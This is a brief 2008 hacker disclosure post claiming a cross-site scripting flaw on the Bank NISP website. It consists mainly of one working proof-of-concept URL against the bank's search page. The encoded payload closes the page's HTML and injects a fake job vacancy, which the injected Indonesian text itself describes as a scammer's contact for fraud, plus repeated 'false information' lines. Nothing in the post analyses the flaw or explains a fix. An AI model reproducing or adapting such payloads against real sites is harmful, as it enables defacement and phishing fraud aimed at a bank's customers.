Bank NISP Vulnerable to XSS


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Monday, July 21st, 2008
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


{image: banknisp.com XSSED by SPYRO KiD}

banknisp.com XSSED by SPYRO KiD

POC:

http://www.banknisp.com/search_section.asp?kategori=6&search=Sales%20Officer%20Mikrobanking%20(BTN/001/0708)%22%20Ditemukan!%3C/font%3E%3Cbr%3E%3Cbr%3E%3Ch1%3E%3Cu%3ECareer%3C/u%3E%3C/h1%3E%3Cbr%3E%3Ch2%3EMisalnya%20Lowongan%20Palsu%20berisi%20contact%20person%20penipu%20disini..%3Cbr%3EMeminta%20user%20untuk%20menghubungi%20si%20penipu%20guna%20aksi%20penipuan%20lebih%20lanjut..%3Cbr%3EInformasi%20palsu..%3Cbr%3EInformasi%20palsu..%3Cbr%3EInformasi%20palsu..%3Ccenter%3E%3Chr%3Ewww.spyrozone.net%3Chr%3E%3Cnoscript%3E


//E.O.F